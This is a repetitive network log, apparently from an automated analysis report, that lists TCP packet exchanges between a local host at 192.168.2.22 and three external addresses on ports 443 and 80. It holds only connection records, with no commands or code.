                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
